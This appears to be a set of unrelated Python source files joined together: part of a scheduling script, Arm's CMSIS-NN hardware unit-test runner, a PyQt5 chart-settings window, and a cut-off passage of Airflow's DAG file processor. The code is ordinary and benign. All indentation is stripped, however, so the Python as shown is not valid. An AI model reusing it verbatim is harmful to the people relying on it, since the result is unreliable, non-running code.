log_message = datetime.datetime.now().ctime() + " : Completed Interval Update"
if hourly:
hourly_content_generation()
log_message += " | hourly == TRUE"
if tworly:
hourly_content_generation()
log_message += " | tworly == TRUE"
print(log_message)
class setInterval :
def __init__(self,interval,action) :
self.interval=interval
self.action=action
self.stopEvent=threading.Event()
self.seconds_passed = datetime.datetime.now().minute*60
if datetime.datetime.now().hour % 2 == 0:
self.seconds_passed += 0
else:
self.seconds_passed += 3600
thread=threading.Thread(target=self.__setInterval)
thread.start()
def __setInterval(self) :
nextTime=time.time()+self.interval
while not self.stopEvent.wait(nextTime-time.time()) :
self.seconds_passed = (self.seconds_passed+self.interval)%7200
if self.seconds_passed == 3600:
nextTime+=self.interval
self.action(True,False)
elif self.seconds_passed == 0:
nextTime+=self.interval
self.action(False,True)
else:
nextTime+=self.interval
self.action(False,False)
def cancel(self) :
self.stopEvent.set()
def update():
inter = setInterval(30,solve_conditions)
# start action every 60s
#inter=setInterval(30,solve_conditions)
#print('just after setInterval -> time : {:.1f}s'.format(time.time()-StartTime))
# will stop interval in 5s
#t=threading.Timer(5,inter.cancel)
#t.start()
|
unittest_targets.py
|
#!/usr/bin/env python3
#
# Copyright (C) 2010-2020 Arm Limited or its affiliates. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
import sys
import json
import copy
import glob
import time
import queue
import shutil
import serial
import argparse
import threading
import subprocess
from os import path
from termcolor import colored
OUTPUT = "Output/"
BASE_PATH = "../../"
CMSIS_PATH = "../../../../../"
UNITY_PATH = "../Unity/"
UNITY_BASE = BASE_PATH + UNITY_PATH
UNITY_SRC = UNITY_BASE + "src/"
CMSIS_FLAGS = " -DARM_MATH_DSP -DARM_MATH_LOOPUNROLL"
def parse_args():
parser = argparse.ArgumentParser(description="Run CMSIS-NN unit tests.",
epilog="Runs on all connected HW supported by Mbed.")
parser.add_argument('--testdir', type=str, default='TESTRUN', help="prefix of output dir name")
parser.add_argument('-s', '--specific-test', type=str, default=None, help="Run a specific test, e.g."
" -s TestCases/test_arm_avgpool_s8 (also this form will work: -s test_arm_avgpool_s8)."
" So basically the different options can be listed with:"
" ls -d TestCases/test_* -1")
parser.add_argument('-c', '--compiler', type=str, default='GCC_ARM', choices=['GCC_ARM', 'ARMC6'])
args = parser.parse_args()
return args
def error_handler(code, text=None):
print("Error: {}".format(text))
sys.exit(code)
def detect_targets(targets):
process = subprocess.Popen(['mbedls'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
print(process.stdout.readline().strip())
while True:
line = process.stdout.readline()
print(line.strip())
if not line:
break
if re.search(r"^\| ", line):
words = (line.split('| '))
target = {"model": words[1].strip(),
"name": words[2].strip()[:-1].replace('[', '_'),
"port": words[4].strip(),
"tid": words[5].strip()} # Target id can be used to filter out targets
targets.append(target)
return_code = process.poll()
if return_code != 0:
error_handler(return_code, 'RETURN CODE {}'.format(process.stderr.read()))
def run_command(command, error_msg=None, die=True):
# TODO handle error:
# cp: error writing '/media/mannil01/NODE_F411RE/TESTRUN_NUCLEO_F411RE_GCC_ARM.bin': No space left on device
# https://os.mbed.com/questions/59636/STM-Nucleo-No-space-left-on-device-when-/
# print(command)
command_list = command.split(' ')
process = subprocess.run(command_list)
if die and process.returncode != 0:
error_handler(process.returncode, error_msg)
return process.returncode
def detect_architecture(target_name, target_json):
arch = None
try:
with open(target_json, "r") as read_file:
data = json.load(read_file)
if data[target_name]['core']:
arch = data[target_name]['core'][:9]
if data[target_name]['core'][:8] == 'Cortex-M':
return arch
error_handler(668, 'Unsupported target: {} with architecture: {}'.format(
target_name, arch))
except Exception as e:
error_handler(667, e)
return arch
def test_target(target, args, main_test):
result = 3
compiler = args.compiler
target_name = target['name']
target_model = target['model']
cmsis_flags = None
unittestframework = 'UNITY_UNITTEST'
dir_name = OUTPUT + args.testdir + '_' + unittestframework + '_' + target_name + '_' + compiler
os.makedirs(dir_name, exist_ok=True)
start_dir = os.getcwd()
os.chdir(dir_name)
try:
target_json = 'mbed-os/targets/targets.json'
if not path.exists("mbed-os.lib"):
print("Initializing mbed in {}".format(os.getcwd()))
run_command('mbed new .')
shutil.copyfile(BASE_PATH + 'Profiles/mbed_app.json', 'mbed_app.json')
arch = detect_architecture(target_model, target_json)
if arch == 'Cortex-M4' or arch == 'Cortex-M7':
cmsis_flags = CMSIS_FLAGS
print("----------------------------------------------------------------")
print("Running {} on {} target: {} with compiler: {} and cmsis flags: {} in directory: {} test: {}\n".format(
unittestframework, arch, target_name, compiler, cmsis_flags, os.getcwd(), main_test))
die = False
flash_error_msg = 'failed to flash'
mbed_command = "compile"
test = ''
additional_options = ' --source ' + BASE_PATH + main_test + \
' --source ' + UNITY_SRC + \
' --profile ' + BASE_PATH + 'Profiles/release.json' + \
' -f'
result = run_command("mbed {} -v -m ".format(mbed_command) + target_model + ' -t ' + compiler +
test +
' --source .'
' --source ' + BASE_PATH + 'TestCases/Utils/'
' --source ' + CMSIS_PATH + 'NN/Include/'
' --source ' + CMSIS_PATH + 'DSP/Include/'
' --source ' + CMSIS_PATH + 'Core/Include/'
' --source ' + CMSIS_PATH + 'NN/Source/ConvolutionFunctions/'
' --source ' + CMSIS_PATH + 'NN/Source/PoolingFunctions/'
' --source ' + CMSIS_PATH + 'NN/Source/NNSupportFunctions/'
' --source ' + CMSIS_PATH + 'NN/Source/FullyConnectedFunctions/'
+ cmsis_flags +
additional_options,
flash_error_msg, die=die)
except Exception as e:
error_handler(666, e)
os.chdir(start_dir)
return result
def read_serial_port(ser, inputQueue, stop):
while True:
if stop():
break
line = ser.readline()
inputQueue.put(line.decode('latin-1').strip())
def test_target_with_unity(target, args, main_test):
port = target['port']
stop_thread = False
baudrate = 9600
timeout = 30
inputQueue = queue.Queue()
tests = copy.deepcopy(target["tests"])
try:
ser = serial.Serial(port, baudrate, timeout=timeout)
except Exception as e:
error_handler(669, "serial exception: {}".format(e))
# Clear read buffer
time.sleep(0.1) # Workaround in response to: open() returns before port is ready
ser.reset_input_buffer()
serial_thread = threading.Thread(target=read_serial_port, args=(ser, inputQueue, lambda: stop_thread), daemon=True)
serial_thread.start()
test_target(target, args, main_test)
start_time = time.time()
while time.time() < start_time + timeout:
if inputQueue.qsize() > 0:
str_line = inputQueue.get()
print(str_line)
test = None
try:
test = str_line.split(':')[2]
test_result = ':'.join(str_line.split(':')[2:4])
except IndexError:
pass
if test in tests:
tests.remove(test)
target[test]["tested"] = True
if test_result == test + ':PASS':
target[test]["pass"] = True
if len(tests) == 0:
break
stop_thread = True
serial_thread.join()
ser.close()
def print_summary(targets):
"""
Return 0 if all test passed
Return 1 if all test completed but one or more failed
Return 2 if one or more tests did not complete or was not detected
"""
passed = 0
failed = 0
tested = 0
expected = 0
return_code = 3
verdict_pass = colored('[ PASSED ]', 'green')
verdict_fail = colored('[ FAILED ]', 'red')
verdict_error = colored('[ ERROR ]', 'red')
print("-----------------------------------------------------------------------------------------------------------")
# Find all passed and failed
for target in targets:
for test in target["tests"]:
expected += 1
if target[test]["tested"]:
tested += 1
if target[test]["pass"]:
passed += 1
else:
failed += 1
if tested != expected:
print("{} Not all tests found".format(verdict_error))
print("{} Expected: {} Actual: {}".format(verdict_error, expected, tested))
return_code = 2
elif tested == passed:
return_code = 0
else:
return_code = 1
# print all test cases
sorted_tc = []
for target in targets:
for test in target["tests"]:
if not target[test]["tested"]:
tc_verdict = verdict_error
elif target[test]["pass"]:
tc_verdict = verdict_pass
else:
tc_verdict = verdict_fail
sorted_tc.append("{} {}: {}".format(tc_verdict, target["name"], test))
sorted_tc.sort()
for tc in sorted_tc:
print(tc)
total = 0
if (passed > 0):
total = passed / expected
if (total == 1.0):
verdict = verdict_pass
else:
verdict = verdict_fail
print("{} Summary: {} tests in total passed on {} targets ({})".
format(verdict, passed, len(targets), ', '.join([t['name'] for t in targets])))
print("{} {:.0f}% tests passed, {} tests failed out of {}".format(verdict, total*100, failed, expected))
return return_code
def test_targets(args):
"""
Return 0 if successful
Return 3 if no targets are detected
Return 4 if no tests are found
"""
result = 0
targets = []
main_tests = []
detect_targets(targets)
if len(targets) == 0:
print("No targets detected!")
return 3
download_unity()
if not parse_tests(targets, main_tests, args.specific_test):
print("No tests found?!")
return 4
for target in targets:
for tst in main_tests:
test_target_with_unity(target, args, tst)
result = print_summary(targets)
return result
def download_unity(force=False):
unity_dir = UNITY_PATH
unity_src = unity_dir+"src/"
process = subprocess.run(['mktemp'], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
download_dir = process.stdout.strip()
run_command("rm -f {}".format(download_dir))
download_dir += '/'
# Check if already downloaded
if not force and path.isdir(unity_dir) and path.isfile(unity_src+"unity.c") and path.isfile(unity_src+"unity.h"):
return
if path.isdir(download_dir):
shutil.rmtree(download_dir)
if path.isdir(unity_dir):
shutil.rmtree(unity_dir)
os.mkdir(unity_dir)
os.makedirs(download_dir, exist_ok=False)
current_dir = os.getcwd()
os.chdir(download_dir)
process = subprocess.Popen("curl -LJO https://api.github.com/repos/ThrowTheSwitch/Unity/tarball/v2.5.0".split(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
for line in process.stderr:
print(line.strip())
print()
for line in process.stdout:
pass
if not line:
error_handler(671)
try:
m = re.search('\'(.+?)\'', line.strip())
except AttributeError as e:
error_handler(673, e)
downloaded_file = download_dir + m.group(1)
os.chdir(current_dir)
try:
filename_base = downloaded_file.split('-')[0]
except IndexError as e:
error_handler(674, e)
if not filename_base:
error_handler(675)
run_command("tar xzf "+downloaded_file+" -C "+unity_dir+" --strip-components=1")
os.chdir(current_dir)
# Cleanup
shutil.rmtree(download_dir)
def parse_tests(targets, main_tests, specific_test=None):
"""
Generate test runners and parse it to know what to expect from the serial console
Return True if successful
"""
test_found = False
directory = 'TestCases'
if specific_test and '/' in specific_test:
specific_test = specific_test.strip(directory).replace('/', '')
for dir in next(os.walk(directory))[1]:
if re.search(r'test_arm', dir):
if specific_test and dir != specific_test:
continue
test_found = True
testpath = directory + '/' + dir + '/Unity/'
ut_test_file = None
for content in os.listdir(testpath):
if re.search(r'unity_test_arm', content):
ut_test_file = content
if ut_test_file is None:
print("Warning: invalid path: ", testpath)
continue
main_tests.append(testpath)
ut_test_file_runner = path.splitext(ut_test_file)[0] + '_runner' + path.splitext(ut_test_file)[1]
test_code = testpath + ut_test_file
test_runner_path = testpath + 'TestRunner/'
if not os.path.exists(test_runner_path):
os.mkdir(test_runner_path)
test_runner = test_runner_path + ut_test_file_runner
for old_files in glob.glob(test_runner_path + '/*'):
if not old_files.endswith('readme.txt'):
os.remove(old_files)
# Generate test runners
run_command('ruby '+UNITY_PATH+'auto/generate_test_runner.rb ' + test_code + ' ' + test_runner)
test_found = parse_test(test_runner, targets)
if not test_found:
return False
if not test_found:
return False
return True
def parse_test(test_runner, targets):
tests_found = False
# Get list of tests
try:
read_file = open(test_runner, "r")
except IOError as e:
error_handler(670, e)
else:
with read_file:
for line in read_file:
if not line:
break
if re.search(r" run_test\(", line) and len(line.strip().split(',')) == 3:
function = line.strip().split(',')[0].split('(')[1]
tests_found = True
for target in targets:
if 'tests' not in target.keys():
target['tests'] = []
target["tests"].append(function)
target[function] = {}
target[function]["pass"] = False
target[function]["tested"] = False
return tests_found
if __name__ == '__main__':
args = parse_args()
sys.exit(test_targets(args))
|
WrappedVisualizationWindow.py
|
import pickle
import time
import threading
from PyQt5 import QtWidgets
from PyQt5.QtWidgets import (QWidget, QToolTip, QPushButton, QApplication, QMessageBox)
from .VisualizationWindow import VisualizationWindow
import sys
sys.path.append("...")
from backend import ModuleManipulator
class WrappedVisualizationWindow(VisualizationWindow, QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.setupUi(self)
self.setWindowTitle('Визуализация')
self.settings = {
'linear': True,
'log': True,
'corr': True,
'heatmap': True,
'scatter': True,
'hist': True,
'box': True,
'piechart': True,
'dotplot': True,
}
self.checkBoxPie.setChecked(True)
self.checkBoxLinear.setChecked(True)
self.checkBoxHeatmap.setChecked(True)
self.checkBoxLog.setChecked(True)
self.checkBoxHist.setChecked(True)
self.checkBoxCorr.setChecked(True)
self.checkBoxBox.setChecked(True)
self.checkBoxScatter.setChecked(True)
self.checkBoxDot.setChecked(True)
self.__build_buttons()
def __build_buttons(self):
self.pushButton.clicked.connect(self.back)
self.pushButtonDone.clicked.connect(self.done)
self.checkBoxPie.clicked.connect(self.check_pie)
self.checkBoxLinear.clicked.connect(self.check_linear)
self.checkBoxLog.clicked.connect(self.check_log)
self.checkBoxCorr.clicked.connect(self.check_corr)
self.checkBoxHeatmap.clicked.connect(self.check_heatmap)
self.checkBoxScatter.clicked.connect(self.check_scatter)
self.checkBoxHist.clicked.connect(self.check_hist)
self.checkBoxBox.clicked.connect(self.check_box)
self.checkBoxDot.clicked.connect(self.check_dot)
def back(self):
self.hide()
self.parent.show()
def done(self):
with open('settings.py', 'rb') as f:
data = pickle.load(f)
data['MODULE_SETTINGS']['graphs'].update(self.settings)
with open('settings.py', 'wb') as f:
pickle.dump(data, f)
with open('settings.py', 'rb') as f:
settings = pickle.load(f)
module_starter = ModuleManipulator(settings)
threading.Thread(target=module_starter.start, daemon=True).start()
self.hide()
self.child.show()
def check_linear(self):
msg = QMessageBox()
msg.setIcon(QMessageBox.Information)
msg.setText("This is a message box")
msg.setInformativeText("This is additional information")
msg.setWindowTitle("MessageBox demo")
msg.setDetailedText("The details are as follows:")
msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)
if self.checkBoxLinear.isChecked():
self.checkBoxLinear.setChecked(True)
self.settings['linear'] = True
else:
self.checkBoxLinear.setChecked(False)
self.settings['linear'] = False
def check_log(self):
if self.checkBoxLog.isChecked():
self.checkBoxLog.setChecked(True)
self.settings['log'] = True
else:
self.checkBoxLog.setChecked(False)
self.settings['log'] = False
def check_corr(self):
if self.checkBoxCorr.isChecked():
self.checkBoxCorr.setChecked(True)
self.settings['corr'] = True
else:
self.checkBoxCorr.setChecked(False)
self.settings['corr'] = False
def check_heatmap(self):
if self.checkBoxHeatmap.isChecked():
self.checkBoxHeatmap.setChecked(True)
self.settings['heatmap'] = True
else:
self.checkBoxHeatmap.setChecked(False)
self.settings['heatmap'] = False
def check_scatter(self):
if self.checkBoxScatter.isChecked():
self.checkBoxScatter.setChecked(True)
self.settings['scatter'] = True
else:
self.checkBoxScatter.setChecked(False)
self.settings['scatter'] = False
def check_hist(self):
if self.checkBoxHist.isChecked():
self.checkBoxHist.setChecked(True)
self.settings['hist'] = True
else:
self.checkBoxHist.setChecked(False)
self.settings['hist'] = False
def check_box(self):
if self.checkBoxBox.isChecked():
self.checkBoxBox.setChecked(True)
self.settings['box'] = True
else:
self.checkBoxBox.setChecked(False)
self.settings['box'] = False
def check_dot(self):
if self.checkBoxDot.isChecked():
self.checkBoxDot.setChecked(True)
self.settings['dotplot'] = True
else:
self.checkBoxDot.setChecked(False)
self.settings['dotplot'] = False
def check_pie(self):
if self.checkBoxBar.isChecked():
self.checkBoxBar.setChecked(True)
self.settings['piechart'] = True
else:
self.checkBoxBar.setChecked(False)
self.settings['piechart'] = False
|
processor.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import logging
import multiprocessing
import os
import signal
import threading
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Iterator, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import func, or_
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.models import SlaMiss, errors
from airflow.models.dag import DAG, DagModel
from airflow.models.dagbag import DagBag
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.state import State
DR = models.DagRun
TI = models.TaskInstance
class DagFileProcessorProcess(LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of DagFileProcessor.process_file(file_path).
self._result: Optional[Tuple[int, int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
parent_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
callback_requests: List[CallbackRequest],
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param parent_channel: the parent end of the channel to close in the child
:type parent_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
# Since we share all open FDs from the parent, we need to close the parent side of the pipe here in
# the child, else it won't get closed properly until we exit.
log.info("Closing parent pipe")
parent_channel.close()
del parent_channel
set_context(log, file_path)
setproctitle(f"airflow scheduler - DagFileProcessor {file_path}")
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)), redirect_stderr(
StreamLogWriter(log, logging.WARN)
), Stats.timer() as timer:
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[int, int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
callback_requests=callback_requests,
)
result_channel.send(result)
log.info("Processing %s took %.3f seconds", file_path, timer.duration)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
result_channel.close()
def start(self) -> None:
"""Launch the process and start processing the DAG."""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
_parent_channel, _child_channel = context.Pipe(duplex=False)
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
_parent_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
f"DagFileProcessor{self._instance_id}",
self._callback_requests,
),
name=f"DagFileProcessor{self._instance_id}-Process",
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
# Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
# from closing in some cases
_child_channel.close()
del _child_channel
# Don't store it on self until after we've started the child process - we don't want to keep it from
# getting GCd/closed
self._parent_channel = _parent_channel
def kill(self) -> None:
"""Kill the process launched to process the file, and ensure consistent state."""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
if self._parent_channel:
self._parent_channel.close()
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
# If we get an EOFError, it means the child end of the pipe has been closed. This only happens
# in the finally block. But due to a possible race condition, the process may have not yet
# terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
# "suitable" timeout.
self._done = True
# Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
self._process.join(timeout=5)
if self._process.is_alive():
# Didn't shut down cleanly - kill it
self._kill_process()
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[int, int]]:
"""
:return: result of running DagFileProcessor.process_file()
:rtype: tuple[int, int] or None
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Execute any Callbacks if passed to DagFileProcessor.process_file
3. Serialize the DAGs and save it to DB (or update existing record in the DB).
4. Pickle the DAG and save it to the DB (if necessary).
5. Record any errors importing the file into ORM
Returns a tuple of 'number of dags found' and 'the count of import errors'
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
self.log.info("Running SLA Checks for %s", dag.dag_id)
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session.query(TI.task_id, func.max(DR.execution_date).label('max_ti'))
.join(TI.dag_run)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id)
.subquery('sq')
)
# get recorded SlaMiss
recorded_slas_query = set(
session.query(SlaMiss.dag_id, SlaMiss.task_id, SlaMiss.execution_date).filter(
SlaMiss.dag_id == dag.dag_id, SlaMiss.task_id.in_(dag.task_ids)
)
)
max_tis: Iterator[TI] = (
session.query(TI)
.join(TI.dag_run)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
DR.execution_date == qry.c.max_ti,
)
)
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not task.sla:
continue
if not isinstance(task.sla, timedelta):
raise TypeError(
f"SLA is expected to be timedelta object, got "
f"{type(task.sla)} in {task.dag_id}:{task.task_id}"
)
sla_misses = []
next_info = dag.next_dagrun_info(dag.get_run_data_interval(ti.dag_run), restricted=False)
if next_info is None:
self.log.info("Skipping SLA check for %s because task does not have scheduled date", ti)
else:
while next_info.logical_date < ts:
next_info = dag.next_dagrun_info(next_info.data_interval, restricted=False)
if next_info is None:
break
if (ti.dag_id, ti.task_id, next_info.logical_date) in recorded_slas_query:
break
if next_info.logical_date + task.sla < ts:
sla_miss = SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=next_info.logical_date,
timestamp=ts,
)
sla_misses.append(sla_miss)
if sla_misses:
session.add_all(sla_misses)
session.commit()
slas: List[SlaMiss] = (
session.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa
.all()
)
if slas:
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session.query(TI)
.filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
.all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join(sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas)
blocking_task_list = "\n".join(
ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis
)
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info('Calling SLA miss callback')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
email_content = f"""\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}<code></pre>
Airflow Webserver URL: {conf.get(section='webserver', key='base_url')}
"""
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
email_sent = True
notification_sent = True
except Exception:
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
sla.email_sent = email_sent
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename.startswith(dagbag_file)
).delete(synchronize_session="fetch")
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
(
session.query(DagModel)
.filter(DagModel.fileloc == filename)
.update({'has_import_errors': True}, synchronize_session='fetch')
)
session.add(
errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
)
session.commit()
@provide_session
def execute_callbacks(
self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = NEW_SESSION
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param dagbag: Dag Bag of dags
:param callback_requests: failure callbacks to execute
